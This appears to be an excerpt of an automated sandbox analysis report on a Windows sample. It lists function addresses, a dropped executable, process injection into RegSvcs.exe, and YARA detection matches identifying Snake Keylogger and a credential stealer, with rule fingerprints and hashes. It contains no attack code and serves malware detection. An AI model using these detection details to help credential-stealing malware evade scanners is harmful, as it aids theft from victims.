Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01201C80	0_2_01201C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01208497	0_2_01208497
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012013D8	0_2_012013D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012026E0	0_2_012026E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01203535	0_2_01203535
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01208D1C	0_2_01208D1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0120A142	0_2_0120A142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0120A150	0_2_0120A150
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01208D58	0_2_01208D58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205871	0_2_01205871
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01200878	0_2_01200878
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01204478	0_2_01204478
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205880	0_2_01205880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01204488	0_2_01204488
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205CE0	0_2_01205CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01208740	0_2_01208740
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0120934E	0_2_0120934E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01208750	0_2_01208750
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01201387	0_2_01201387
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012093D0	0_2_012093D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205638	0_2_01205638
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205648	0_2_01205648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205AE9	0_2_01205AE9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01205AF8	0_2_01205AF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012016C1	0_2_012016C1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B1D1A7	0_2_02B1D1A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B119DC	0_2_02B119DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B1B028	0_2_02B1B028
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B1B018	0_2_02B1B018
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B1904C	0_2_02B1904C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02B11F3B	0_2_02B11F3B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0A0E1870	0_2_0A0E1870
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0A0E9D90	0_2_0A0E9D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0A0E1860	0_2_0A0E1860
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA0BAA8	0_2_0AA0BAA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA00FA9	0_2_0AA00FA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA03BC0	0_2_0AA03BC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA06160	0_2_0AA06160
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA066B8	0_2_0AA066B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA03FF8	0_2_0AA03FF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0AA04430	0_2_0AA04430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017C6108	6_2_017C6108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CC190	6_2_017CC190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CC470	6_2_017CC470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CB4A0	6_2_017CB4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CC753	6_2_017CC753
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017C6730	6_2_017C6730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017C9858	6_2_017C9858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CBBD3	6_2_017CBBD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CCA33	6_2_017CCA33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017C4AD9	6_2_017C4AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CBEB0	6_2_017CBEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017C3573	6_2_017C3573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CB4F3	6_2_017CB4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 6_2_017CB483	6_2_017CB483
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025626E0	8_2_025626E0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025613D8	8_2_025613D8
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02568497	8_2_02568497
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02561C80	8_2_02561C80
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025635C0	8_2_025635C0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565648	8_2_02565648
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565638	8_2_02565638
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025616C1	8_2_025616C1
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565AF8	8_2_02565AF8
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565AE9	8_2_02565AE9
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02568750	8_2_02568750
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02568740	8_2_02568740
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02569337	8_2_02569337
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025693D0	8_2_025693D0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_0256938E	8_2_0256938E
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025613B3	8_2_025613B3
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565871	8_2_02565871
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02564478	8_2_02564478
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_025634D0	8_2_025634D0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565CE0	8_2_02565CE0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02565880	8_2_02565880
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02564488	8_2_02564488
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_0256A150	8_2_0256A150
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02568D58	8_2_02568D58
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_0256A142	8_2_0256A142
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02568D1C	8_2_02568D1C
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_04C819DC	8_2_04C819DC
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_04C8904C	8_2_04C8904C
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_04C8B018	8_2_04C8B018
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_04C8B028	8_2_04C8B028
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_04C81F3A	8_2_04C81F3A
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_097C1870	8_2_097C1870
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_097C1860	8_2_097C1860
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_09B10FB0	8_2_09B10FB0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_09B16160	8_2_09B16160
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_09B13BC0	8_2_09B13BC0
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_09B14430	8_2_09B14430
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_09B13FF8	8_2_09B13FF8
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_09B166B8	8_2_09B166B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5B328	11_2_02B5B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5C190	11_2_02B5C190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B56108	11_2_02B56108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5C752	11_2_02B5C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5C470	11_2_02B5C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B54AD9	11_2_02B54AD9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5CA32	11_2_02B5CA32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5BBD2	11_2_02B5BBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B56880	11_2_02B56880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B59858	11_2_02B59858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5BEB0	11_2_02B5BEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B5B4F2	11_2_02B5B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_02B53572	11_2_02B53572

Source: file.exe

Static PE information: invalid certificate

Source: file.exe, 00000000.00000002.1734665410.00000000044C3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
Source: file.exe, 00000000.00000002.1739159152.0000000009EA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
Source: file.exe, 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
Source: file.exe, 00000000.00000002.1733189829.0000000003016000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs file.exe
Source: file.exe, 00000000.00000002.1733189829.0000000002C7E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs file.exe
Source: file.exe, 00000000.00000002.1731549374.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.1740095431.000000000A990000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000000.1677877238.0000000000988000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameZCyK.exe" vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameZCyK.exe" vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: NPadpxkCGKGoat.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.file.exe.4771620.3.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
